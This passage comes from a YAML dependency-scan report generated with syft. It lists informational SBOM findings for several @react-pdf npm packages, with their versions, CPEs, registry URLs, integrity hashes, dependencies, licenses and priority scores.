- cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/fns@3.1.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz
|
|
integrity: sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0e189b3633f52f28
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/font 2.5.2'
|
|
title: '@react-pdf/font 2.5.2'
|
|
description: 'Package discovered: @react-pdf/font 2.5.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 15064a64821e35da
|
|
name: '@react-pdf/font'
|
|
version: 2.5.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/font:2.5.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/font@2.5.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/font/-/font-2.5.2.tgz
|
|
integrity: sha512-Ud0EfZ2FwrbvwAWx8nz+KKLmiqACCH9a/N/xNDOja0e/YgSnqTpuyHegFBgIMKjuBtO5dNvkb4dXkxAhGe/ayw==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/types': ^2.6.0
|
|
cross-fetch: ^3.1.5
|
|
fontkit: ^2.0.2
|
|
is-url: ^1.2.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 325345669fb318b9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/font 4.0.8'
|
|
title: '@react-pdf/font 4.0.8'
|
|
description: 'Package discovered: @react-pdf/font 4.0.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 19aa56c736ba6f4e
|
|
name: '@react-pdf/font'
|
|
version: 4.0.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/font:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/font:4.0.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/font@4.0.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/font/-/font-4.0.8.tgz
|
|
integrity: sha512-deNd+emtZAJho1IlzKL9bRoLAGv/6oXOIKO2oZfs4RuXUrK1onLHbJO7e2YoVLPFP/sQxisRTnzdJFtd35iKwA==
|
|
dependencies:
|
|
'@react-pdf/pdfkit': ^5.1.1
|
|
'@react-pdf/types': ^2.11.1
|
|
fontkit: ^2.0.2
|
|
is-url: ^1.2.4
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a9ddc08bb5c72c17
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/image 2.3.6'
|
|
title: '@react-pdf/image 2.3.6'
|
|
description: 'Package discovered: @react-pdf/image 2.3.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e700f7d1572a4159
|
|
name: '@react-pdf/image'
|
|
version: 2.3.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/image:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/image:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/image:2.3.6:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/image@2.3.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/image/-/image-2.3.6.tgz
|
|
integrity: sha512-7iZDYZrZlJqNzS6huNl2XdMcLFUo68e6mOdzQeJ63d5eApdthhSHBnkGzHfLhH5t8DCpZNtClmklzuLL63ADfw==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/png-js': ^2.3.1
|
|
cross-fetch: ^3.1.5
|
|
jay-peg: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 751c0bb9092b6d5a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/layout 3.13.0'
|
|
title: '@react-pdf/layout 3.13.0'
|
|
description: 'Package discovered: @react-pdf/layout 3.13.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: bfc90f0951098a84
|
|
name: '@react-pdf/layout'
|
|
version: 3.13.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/layout:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/layout:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/layout:3.13.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/layout@3.13.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/layout/-/layout-3.13.0.tgz
|
|
integrity: sha512-lpPj/EJYHFOc0ALiJwLP09H28B4ADyvTjxOf67xTF+qkWd+dq1vg7dw3wnYESPnWk5T9NN+HlUenJqdYEY9AvA==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/fns': 2.2.1
|
|
'@react-pdf/image': ^2.3.6
|
|
'@react-pdf/pdfkit': ^3.2.0
|
|
'@react-pdf/primitives': ^3.1.1
|
|
'@react-pdf/stylesheet': ^4.3.0
|
|
'@react-pdf/textkit': ^4.4.1
|
|
'@react-pdf/types': ^2.6.0
|
|
cross-fetch: ^3.1.5
|
|
emoji-regex: ^10.3.0
|
|
queue: ^6.0.1
|
|
yoga-layout: ^2.0.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 18357a3fbdd2a393
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/pdfkit 3.2.0'
|
|
title: '@react-pdf/pdfkit 3.2.0'
|
|
description: 'Package discovered: @react-pdf/pdfkit 3.2.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3f225c34b86f8909
|
|
name: '@react-pdf/pdfkit'
|
|
version: 3.2.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:3.2.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/pdfkit@3.2.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-3.2.0.tgz
|
|
integrity: sha512-OBfCcnTC6RpD9uv9L2woF60Zj1uQxhLFzTBXTdcYE9URzPE/zqXIyzpXEA4Vf3TFbvBCgFE2RzJ2ZUS0asq7yA==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/png-js': ^2.3.1
|
|
browserify-zlib: ^0.2.0
|
|
crypto-js: ^4.2.0
|
|
fontkit: ^2.0.2
|
|
jay-peg: ^1.0.2
|
|
vite-compatible-readable-stream: ^3.6.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a9e659420a7b937a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/pdfkit 5.1.1'
|
|
title: '@react-pdf/pdfkit 5.1.1'
|
|
description: 'Package discovered: @react-pdf/pdfkit 5.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 24d45580f4c0f7bb
|
|
name: '@react-pdf/pdfkit'
|
|
version: 5.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/pdfkit:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/pdfkit:5.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/pdfkit@5.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/pdfkit/-/pdfkit-5.1.1.tgz
|
|
integrity: sha512-wNcdSsNlNYyGHGAgIdt453egBF7fiF9UxpRlklUfVvu8OWCrUppG9xiUrPLVoKiqWet5tMi0w6LmuFUJuYqjEg==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@noble/ciphers': ^1.0.0
|
|
'@noble/hashes': ^1.6.0
|
|
browserify-zlib: ^0.2.0
|
|
fontkit: ^2.0.2
|
|
jay-peg: ^1.1.1
|
|
js-md5: ^0.8.3
|
|
linebreak: ^1.1.0
|
|
png-js: ^2.0.0
|
|
vite-compatible-readable-stream: ^3.6.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aadf20f14ed3a63a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/png-js 2.3.1'
|
|
title: '@react-pdf/png-js 2.3.1'
|
|
description: 'Package discovered: @react-pdf/png-js 2.3.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ecd22ec88d1d110f
|
|
name: '@react-pdf/png-js'
|
|
version: 2.3.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/png-js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/png_js:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/png:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/png:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/png-js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/png_js:2.3.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/png-js@2.3.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/png-js/-/png-js-2.3.1.tgz
|
|
integrity: sha512-pEZ18I4t1vAUS4lmhvXPmXYP4PHeblpWP/pAlMMRkEyP7tdAeHUN7taQl9sf9OPq7YITMY3lWpYpJU6t4CZgZg==
|
|
dependencies:
|
|
browserify-zlib: ^0.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4f8cb527e021a217
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/primitives 3.1.1'
|
|
title: '@react-pdf/primitives 3.1.1'
|
|
description: 'Package discovered: @react-pdf/primitives 3.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 18694a13e91dacfb
|
|
name: '@react-pdf/primitives'
|
|
version: 3.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:3.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/primitives@3.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz
|
|
integrity: sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2743499890ec5e22
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/primitives 4.3.0'
|
|
title: '@react-pdf/primitives 4.3.0'
|
|
description: 'Package discovered: @react-pdf/primitives 4.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: edf229ed71e6ba52
|
|
name: '@react-pdf/primitives'
|
|
version: 4.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/primitives:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/primitives:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/primitives@4.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz
|
|
integrity: sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ea34747c8a1e8321
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/render 3.5.0'
|
|
title: '@react-pdf/render 3.5.0'
|
|
